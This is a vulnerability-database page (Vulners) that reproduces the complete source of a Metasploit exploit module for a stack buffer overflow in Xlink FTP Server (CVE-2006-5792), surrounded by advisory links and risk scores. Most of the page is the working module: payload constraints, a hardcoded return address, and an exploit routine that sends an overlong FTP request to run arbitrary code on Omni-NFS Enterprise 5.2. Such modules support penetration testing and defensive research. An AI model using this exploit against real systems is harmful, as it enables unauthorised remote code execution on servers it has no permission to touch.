Lucene search
K

Xlink FTP Server Buffer Overflow

šŸ—“ļøĀ 03 Oct 2009Ā 23:05:44Reported byĀ MC <[email protected]>TypeĀ 
metasploit
Ā metasploit
šŸ”—Ā www.rapid7.comšŸ‘Ā 31Ā Views

Xlink FTP Server Buffer Overflow in Omni-NFS Enterprise 5.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-5792
11 Nov 201000:00
–circl
Check Point Advisories
Xlink FTP Server Request Buffer Overflow (CVE-2006-5792)
14 Oct 201500:00
–checkpoint_advisories
CVE
CVE-2006-5792
7 Nov 200623:00
–cve
Cvelist
CVE-2006-5792
7 Nov 200623:00
–cvelist
Exploit DB
Xlink FTP Server - Remote Buffer Overflow (Metasploit)
11 Nov 201000:00
–exploitdb
Exploit DB
Xlink FTP Client - Remote Buffer Overflow (Metasploit)
11 Nov 201000:00
–exploitdb
Metasploit
Xlink FTP Client Buffer Overflow
3 Oct 200923:05
–metasploit
NVD
CVE-2006-5792
7 Nov 200623:07
–nvd
Packet Storm
Xlink FTP Client Buffer Overflow
26 Nov 200900:00
–packetstorm
Packet Storm
Xlink FTP Server Buffer Overflow
26 Nov 200900:00
–packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xlink FTP Server Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Xlink FTP Server
        that comes bundled with Omni-NFS Enterprise 5.2.
        When a overly long FTP request is sent to the server,
        arbitrary code may be executed.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-5792' ],
          [ 'OSVDB', '58646' ],
          [ 'URL', 'http://www.xlink.com' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 260,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Omni-NFS Enterprise V5.2', { 'Ret' => 0x1001f09c } ], # OmniEOM.DLL 1.0.0.1
        ],
      'DisclosureDate' => '2009-10-03',
      'DefaultTarget'  => 0))

    deregister_options('FTPUSER', 'FTPPASS')
  end

  def check
    connect
    disconnect

    if (banner =~ /XLINK FTP Server/)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit

    connect

    sploit =  payload.encoded + [target.ret].pack('V')
    sploit << rand_text_alpha_upper(2024 - payload.encoded.length) + "\r\n"

    print_status("Trying target #{target.name}...")
    sock.put(sploit)

    handler
    disconnect

  end
end

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
EPSS0.59961
31